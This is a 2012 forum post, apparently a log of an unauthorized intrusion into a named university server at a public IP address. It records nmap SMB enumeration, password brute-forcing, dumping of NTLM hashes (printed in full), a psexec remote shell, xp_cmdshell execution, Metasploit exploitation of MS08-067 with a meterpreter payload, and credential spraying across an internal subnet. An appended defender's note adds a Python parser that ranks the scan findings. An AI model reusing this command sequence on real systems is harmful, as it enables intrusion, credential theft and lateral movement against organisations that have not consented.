中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: nmap+msf intrusion into Guangxi Normal University

Author: admin    Time: 2012-12-4 12:46

Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r(
SF:GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // use msf to exploit the MS08-067 vulnerability on the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack~~
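Added note from a defender's side, not part of the original post: the three findings that made this walkthrough work (anonymous READ on IPC$, a blank administrator password, MS08-067 still unpatched) are exactly what an internal vulnerability scan should surface. The Python below is my own example, not the forum author's or nmap's code; it parses the smb-* host-script output in the format printed above into severity-ranked findings, using a constructed sample on the documentation address 192.0.2.10 rather than any real host.

```python
import re
from collections import namedtuple

# Added example (not from the original post): triage nmap smb-* host-script
# output, in the format shown above, into findings a defender can act on.
Finding = namedtuple("Finding", "host severity script detail")

_HOST_RE = re.compile(r"^Nmap scan report for .*?\(?(\d+\.\d+\.\d+\.\d+)\)?\s*$")
_SCRIPT_RE = re.compile(r"^\|\s*([a-z0-9-]+):\s*$")        # "| smb-brute:"
_LOGIN_RE = re.compile(r"^\|[_ ]\s*(\S+?):(\S+) => Login was successful")
_SHARE_RE = re.compile(r"^\|\s+(\S+)\s*$")                 # "|   IPC$"
_ANON_RE = re.compile(r"^\|[_ ]\s+Anonymous access:\s*(\S+)")
_VULN_RE = re.compile(r"^\|[_ ]\s+(MS\d{2}-\d{3}):\s*(\S+)")
_ORDER = {"critical": 0, "high": 1, "medium": 2}


def triage(nmap_output):
    """Parse nmap text output and return findings, most severe first."""
    findings, host, script, share = [], None, None, None
    for line in nmap_output.splitlines():
        if m := _HOST_RE.match(line):                 # new host block
            host, script, share = m.group(1), None, None
        elif m := _SCRIPT_RE.match(line):             # new NSE script block
            script = m.group(1)
        elif script == "smb-brute" and (m := _LOGIN_RE.match(line)):
            user, pw = m.groups()
            sev, kind = ("critical", "empty") if pw == "<blank>" else ("high", "guessable")
            findings.append(Finding(host, sev, script, f"account {user}: {kind} password"))
        elif script == "smb-enum-shares" and (m := _SHARE_RE.match(line)):
            share = m.group(1)                        # share name precedes its access line
        elif script == "smb-enum-shares" and (m := _ANON_RE.match(line)):
            if m.group(1) != "<none>":
                findings.append(Finding(host, "medium", script,
                                        f"share {share} allows anonymous {m.group(1)}"))
        elif script == "smb-check-vulns" and (m := _VULN_RE.match(line)):
            if m.group(2) == "VULNERABLE":
                findings.append(Finding(host, "critical", script, f"missing patch for {m.group(1)}"))
    return sorted(findings, key=lambda f: _ORDER[f.severity])


# Constructed sample in the format nmap printed above; 192.0.2.10 is a
# documentation address, not a real host.
SAMPLE = """\
Nmap scan report for bogon (192.0.2.10)
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""
```

Feeding it the text of a normal-output scan (nmap -oN) of an internal range gives one ranked list per host, with blank passwords and missing MS08-067 patches at the top.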